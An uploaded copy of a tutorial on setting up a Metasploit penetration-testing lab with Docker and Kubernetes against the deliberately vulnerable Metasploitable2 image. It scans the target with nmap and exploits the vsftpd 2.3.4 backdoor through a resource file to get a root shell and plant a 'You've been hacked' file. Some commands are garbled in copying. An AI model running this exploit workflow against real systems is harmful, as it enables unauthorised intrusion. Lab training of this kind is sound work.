Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
Uploaded by ojovbo nelson

Docker and Kubernetes

advertisement 
Metasploit with Docker and Kubernetes
Last Updated on July 14, 2020 by Kalitut Leave a Comment
Running Metasploit with Docker and Kubernetes
This article is intended to make it easy to build a penetration test environment
without complicated settings if Docker and Kubernetes are introduced.
[If you implement the contents of this article to a server or network that you do
not manage yourself, please be aware that it may violate the unauthorized
access prohibition law]
Environment used in this article
$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.5 LTS"
$ docker --version
Docker version 18.09.0, build 4d60db4
$ minikube version
minikube version: v0.29.0
Things necessary
All things to use this time are in GitHub and Docker Hub . Since GitHub also has
a Dockerfile of Metasploit images etc., please remodel it so that it is easy to use.
Let’s get the things we need by executing the commands below in order.
$ git clone https://github.com/SauravBrahma/MetasploitImage.git
$ docker pull sauravbrahma/metasploit_image
$ docker pull tleemcjr/metasploitable2
Now that you have got what you need, let’s move it.
Build an environment with Docker
$ docker run --rm -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash"
* Starting web server apache2
[ OK ]
* Starting deferred execution scheduler atd
[ OK ]
* Starting periodic command scheduler crond
[ OK ]
・
・
・
* Starting internet superserver xinetd
[ OK ]
* Doing Wacom setup...
[ OK ]
* Running local boot scripts (/etc/rc.local)
[ OK ]
root@c3803e096580:/#
# The IP address is required when specifying an attack target later, so record it.
root @ c3803e096580: / # ifconfig | grep 172
inet addr:172.17.0.5 Bcast:172.17.255.255 Mask:255.255.0.0
# Enter Ctrl-p, Ctrl-q to leave the container while moving, and check if the container is moving
$ docker ps | grep tleemcjr / metasploitable2
c3803e096580
tleemcjr/metasploitable2:latest
"sh -c '/bin/service…" 8 minutes ago
$ docker run --rm -it sauravbrahma/metasploit_image:latest bash
* Starting PostgreSQL 9.3 database server
[ OK ]
msf_user@ef8a1f8f6923:/opt/metasploit-framework$
This completes the environment construction using Docker. Also, this time, an –
rm option is added at the time of execution so that extra containers do not
remain.
Try a penetration test with Docker
Here, let’s actually carry out a penetration test using Docker. Since you are
currently logged in to the attack container, msfconsole entering the command will
launch the Metasploit console.
msf_user@c9521edd20f4:/opt/metasploit-framework$ msfconsole
** Welcome to Metasploit Framework Initial Setup **
Please answer a few questions to get started.
** Metasploit Framework Initial Setup Complete **
.: okOOOkdc '' cdkOOoko :.
.xOOOOOOOOOOOOc
cOOOOOOOOOOOOx.
: OOOOOOOOOOOOOOOk,, kOOOOOOOOOOOOOOO:
OOOOOOOOOkkkkOOOOO:: OOOOOOOOOOOOOOOOOO '
oOOOOOOOO. .oOOOOOOOOOOl. , OOOOOOOOo
dOOOOOOOO. .cOOOOOc. , OOOOOOOOx
lOOOOOOOO.
; d ;
, OOOOOOOOl
.OOOOOOOO. . ;
;
, OOOOOOOO.
cOOOOOOO. .OOc.
oOO. , OOOOOOOc
oooOOOO. .OOOO. : OOOO. , OOOOOOo
lOOOOO. .YES YES. :YES YES. , OOOOOl
;OOOO'
.OOOO.
:OOOO.
;OOOO;
.dOOo
.OOOOocccxOOOO.
xOOd.
, kOl .OOOOOOOOOOOOO. .dOk,
: kk ; .OOOOOOOOOOOOO.cOk:
. kOOOOOOOOOOOOOOOk:
, xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v4.17.35-dev+ -- --=[ 1845 exploits - 1044 auxiliary - 320 post
+ -- --=[ 541 payloads - 44 encoders - 10 nops
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp
]
]
]
]
msf >
This time, I would like to proceed in the following order.
1. Store the result of applying Nmap to Metasploitable in the database
2. Decide which module to use and attack
3. You’ve been hacked Leave a text file with content as evidence that attack
was successful in Metasploitable
4. Check whether the text file remains in Metasploitable side
Let’s attack!
Store the result of applying Nmap to Metasploitable in the database
First, let’s check if the Metasploit is connected to the database.
msf > db_status
[*] postgresql connected to msf_database
msf >
Since the Docker image used this time is connected to the database from the
beginning, it should be output like the above.
Let’s store the result in a database by applying Nmap to Metasploitable.
msf
[*]
[*]
[*]
[*]
[*]
[*]
> db_nmap -A 172.17.0.2
Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2019-01-25 08:56 UTC
Nmap: Nmap scan report for 172.17.0.2
Nmap: Host is up (0.00054s latency).
Nmap: Not shown: 980 closed ports
Nmap: PORT
STATE SERVICE
VERSION
Nmap: 21/tcp open ftp
vsftpd 2.3.4
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
msf
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
Nmap:
>
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh
OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|
1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet
Linux telnetd
25/tcp open smtp
Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ST
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stat
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2019-01-25T08:58:24+00:00; 0s from scanner time.
111/tcp open rpcbind
2 (RPC #100000)
| rpcinfo:
|
program version
port/proto service
|
100000 2
111/tcp rpcbind
|
100003 2,3,4
2049/tcp nfs
|
100003 2,3,4
2049/udp nfs
|
100005 1,2,3
50419/tcp mountd
|
100005 1,2,3
58275/udp mountd
|
100021 1,3,4
33414/tcp nlockmgr
|
100021 1,3,4
58022/udp nlockmgr
|
100024 1
42939/tcp status
|_ 100024 1
49024/udp status
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec
netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open java-rmi
Java RMI Registry
1524/tcp open ingreslock?
2121/tcp open ftp
ProFTPD 1.3.1
3306/tcp open mysql
MySQL 5.0.51a-3ubuntu5
| mysql-info:
|
Protocol: 53
|
Version: .0.51a-3ubuntu5
|
Thread ID: 9
|
Capabilities flags: 43564
|
Some Capabilities: Support41Auth, Speaks41ProtocolNew, ConnectWithDatabase, Switch
|
Status: Autocommit
|_ Salt: g>=Vy7.~VoOz, NetBIOS MAC: (unknown)
| smb-os-discovery:
|
OS: Unix (Samba 3.0.20-Debian)
|
NetBIOS computer name:
|
Workgroup: WORKGROUP
|_ System time: 2019-01-25T03:58:24-05:00
Service detection performed. Please report any incorrect results at https://nmap.org/su
Nmap done: 1 IP address (1 host up) scanned in 137.18 seconds
-A It takes quite some time because you are using options, but please be patient.
You now know a variety of information, such as available ports, services and
OSs that are likely to be running there. By the way, since these are naturally
stored in the database of the container currently logged in, you can also view the
information by sending a query from SQL.
msf > exit
msf_user@c9521edd20f4:/opt/metasploit-framework$ psql -U msf_user msf_database
psql (9.3.17)
Type "help" for help.
msf_database=# SELECT * FROM services;
id | host_id |
created_at
| port | proto | state |
name
|
updated
----+---------+----------------------------+------+-------+-------+-------------+--------------1 |
1 | 2019-01-25 08:58:27.315887 |
21 | tcp
| open | ftp
| 2019-01-25 08:58:27.
2 |
1 | 2019-01-25 08:58:27.777045 |
22 | tcp
| open | ssh
| 2019-01-25 08:58:27.
3 |
1 | 2019-01-25 08:58:27.815226 |
23 | tcp
| open | telnet
| 2019-01-25 08:5
4 |
1 | 2019-01-25 08:58:27.848245 |
25 | tcp
| open | smtp
| 2019-01-25 08:5
5 |
1 | 2019-01-25 08:58:27.913605 | 111 | tcp
| open | rpcbind
| 2019-01-25 08:5
6 |
1 | 2019-01-25 08:58:27.956202 | 139 | tcp
| open | netbios-ssn | 2019-01-25 08:5
7 |
1 | 2019-01-25 08:58:27.989778 | 445 | tcp
| open | netbios-ssn | 2019-01-25 08:5
8 |
1 | 2019-01-25 08:58:28.026979 | 512 | tcp
| open | exec
| 2019-01-25 08:58:28
9 |
1 | 2019-01-25 08:58:28.059262 | 513 | tcp
| open | login
| 2019-01-25 08:5
10 |
1 | 2019-01-25 08:58:28.096009 | 514 | tcp
| open | tcpwrapped | 2019-01-25 08:5
11 |
1 | 2019-01-25 08:58:28.135852 | 1099 | tcp
| open | java-rmi
| 2019-01-25 08:5
12 |
1 | 2019-01-25 08:58:28.182279 | 1524 | tcp
| open | ingreslock | 2019-01-25 08:5
13 |
1 | 2019-01-25 08:58:28.239117 | 2121 | tcp
| open | ftp
| 2019-01-25 08:58:28.
14 |
1 | 2019-01-25 08:58:28.270095 | 3306 | tcp
| open | mysql
| 2019-01-25 08:5
15 |
1 | 2019-01-25 08:58:28.302865 | 5432 | tcp
| open | postgresql | 2019-01-25 08:5
16 |
1 | 2019-01-25 08:58:28.328482 | 5900 | tcp
| open | vnc
| 2019-01-25 08:5
17 |
1 | 2019-01-25 08:58:28.372125 | 6000 | tcp
| open | x11
| 2019-01-25 08:5
18 |
1 | 2019-01-25 08:58:28.399048 | 6667 | tcp
| open | irc
| 2019-01-25 08:5
19 |
1 | 2019-01-25 08:58:28.435059 | 8009 | tcp
| open | ajp13
| 2019-01-25 08:5
20 |
1 | 2019-01-25 08:58:28.479801 | 8180 | tcp
| open | http
| 2019-01-25 08:5
(20 rows)
msf_database=# \q
msf_user@c9521edd20f4:/opt/metasploit-framework$
By storing the result of Nmap in the database in this way, it is possible to import it
during automation and export the result. In addition, when there are multiple
entries in the database, hostsyou can also select an attack target that meets the
conditions by using a command or the like.
Decide which module to use and attack
Now DEPRECATED it has become, but there is db_autopwna plug-in for
automatic attack called Metasploit . db_autopwn Is an excellent way to attack
automatically with information obtained from the database about the attack
target. Even in Docker image you are using this time db_autopwn you Yes is set
to use the ( load db_autopwn and db_autopwn <option> can be used by running
the two commands) is, for true vulnerability is too much,Here is a description of
the resource file that can automate the console. This seems to be something that
automates the task by writing the task which is done many times in the resource
file. Furthermore, ~/.msf4/ if you put resource files below, it will execute the
contents each time you call the console.
This time I do not particularly attack many times, but I think that you can use it
with Kubernetes, which will be described later, so I would like to attack using
resource files. Also, as we know from Nmap results that the ftp service is running
on port 21, we will use the famous module for ftp this time.
easy_pentes.rc
use exploit/unix/ftp/vsftpd_234_backdoor
ROOST set 172.17.0.2
exploit -z
sessions -i 1 -c "id"
sessions -i 1 -c "pwd"
sessions -i 1 -c "echo \"You've been hacked\" > /hacked.txt"
exit -y
This is the only thing that writes to resource files. Only the module used and the
target IP and execution instruction of the attack. By the way, in
the sessions command part, you can specify an instruction which you want to
execute as an -i option for any session -c.
Let’s run this resource file from Metasploit.
msf_user@c9521edd20f4:/opt/metasploit-framework$ msfconsole -q -r easy_pentes.rc
[*] Processing easy_pentes.rc for ERB directives.
resource (easy_pentes.rc)> use exploit/unix/ftp/vsftpd_234_backdoor
resource ( easy_pentes.rc )> RHOST set 172.17.0.2
RHOST => 172.17.0.2
resource (easy_pentes.rc)> exploit -z
[*] 172.17.0.2:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.17.0.2:21 - USER: 331 Please specify the password.
[+] 172.17.0.2:21 - Backdoor service has been spawned, handling...
[+] 172.17.0.2:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Session 1 created in the background.
resource (easy_pentes.rc)> sessions -i 1 -c "id"
[*] Running 'id' on shell session 1 (172.17.0.2)
uid=0(root) gid=0(root)
resource (easy_pentes.rc)> sessions -i 1 -c "pwd"
[*] Running 'pwd' on shell session 1 (172.17.0.2)
/
resource (easy_pentes.rc)> sessions -i 1 -c "echo \"You've been hacked\" > /hacked.txt"
[*] Running 'echo "You've been hacked" > /hacked.txt' on shell session 1 (172.17.0.2)
resource (easy_pentes.rc)> exit -y
msf_user@c9521edd20f4:/opt/metasploit-framework$
It seems that I was able to attack safely. It can be confirmed that this attack has
gained root privileges. Also, the directory at the time of the successful
attack / seems to be the top . You can also load resource files by adding options
to the msfconsole command and -r turn -q off the banner by adding options.
Check whether the text file remains in Metasploitable side
Let’s confirm from the Metasploitable side that the attack was successful. Please
log in to Metasploitable. The hacked.txt directory I wrote above / should have
been written, so it should not be necessary to move the directory in particular.
root@ee769a0fc9f6:/# ls
bin boot cdrom core dev etc hacked.txt
root@ee769a0fc9f6:/# cat hacked.txt
You've been hacked
root@ee769a0fc9f6:/#
home
initrd
initrd.img
lib
lost+found
media
It was confirmed from the Metasploitable side that it was infringed.
The penetration test using Docker is above.
Try to make lots with Kubernetes
$ kubectl apply -f yaml / metasploit.yaml
replicaset.apps/metasploit-rc created
$ kubectl apply -f yaml / metasploitable.yaml
replicaset.apps/metasploitable2-rc created
$ kubectl get pods -o wide
NAME
READY
STATUS
RESTARTS
AGE
IP
NODE
metasploit-rc-nxwd2
1/1
Running
0
17s
172.17.0.5
minikube
metasploitable2-rc-f9dzd
1/1
Running
0
11s
172.17.0.6
minikube
metasploitable2-rc-mbz95
0/1
ContainerCreating
0
11s
minikube
metasploitable2-rc-s2lwh
0/1
ContainerCreating
0
11s
minikube
$ kubectl get pods -o wide
NAME
READY
STATUS
RESTARTS
AGE
IP
NODE
metasploit-rc-nxwd2
1/1
Running
0
23s
172.17.0.5
minikube
metasploitable2-rc-f9dzd
1/1
Running
0
17s
172.17.0.6
minikube
metasploitable2-rc-mbz95
1/1
Running
0
17s
172.17.0.8
minikube
metasploitable2-rc-s2lwh
1/1
Running
0
17s
172.17.0.7
minikube
This time, I wanted to create many Metasploit Pods and Metasploitable Pods
easily, so I used the ReplicaSet resource. By default, one Metasploit Pod and
three Metasploitable Pods are created, but you can spec.replicas create as many
verification environments as you like by changing the fields of each YAML file .
Let’s check if we can communicate with other pods by entering one of the above
pods.
$ kubectl exec -it metasploit-rc-nxwd2 bash
msf_user@metasploit-rc-nxwd2:/opt/metasploit-framework$ ping 172.17.0.6
PING 172.17.0.6 (172.17.0.6) 56(84) bytes of data.
64 bytes from 172.17.0.6: icmp_seq=1 ttl=64 time=0.088 ms
64 bytes from 172.17.0.6: icmp_seq=2 ttl=64 time=0.049 ms
64 bytes from 172.17.0.6: icmp_seq=3 ttl=64 time=0.039 ms
64 bytes from 172.17.0.6: icmp_seq=4 ttl=64 time=0.040 ms
^C
--- 172.17.0.6 ping statistics --4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.039/0.054/0.088/0.020 ms
You seem to be able to communicate safely. This completes the environment
construction using Kubernetes.
Kubernetes can perform penetration tests in the same way as Docker showed.
That’s it. Thank you for reading so far!
We hope that the content of this article will be useful for the penetration test
assuming various situations.
Related documents
Old MIDTERM EXAM for 154
Old MIDTERM EXAM for 154
Presentations
Presentations
SI110 Homework Alpha: ________ Name: ___________________ Page... Collaboration Policy: Default ...
SI110 Homework Alpha: ________ Name: ___________________ Page... Collaboration Policy: Default ...
Nmap - Personal Home Pages (at UEL)
Nmap - Personal Home Pages (at UEL)
IT Security Incident Response
IT Security Incident Response
Slides - PRA Lab
Slides - PRA Lab
Download
advertisement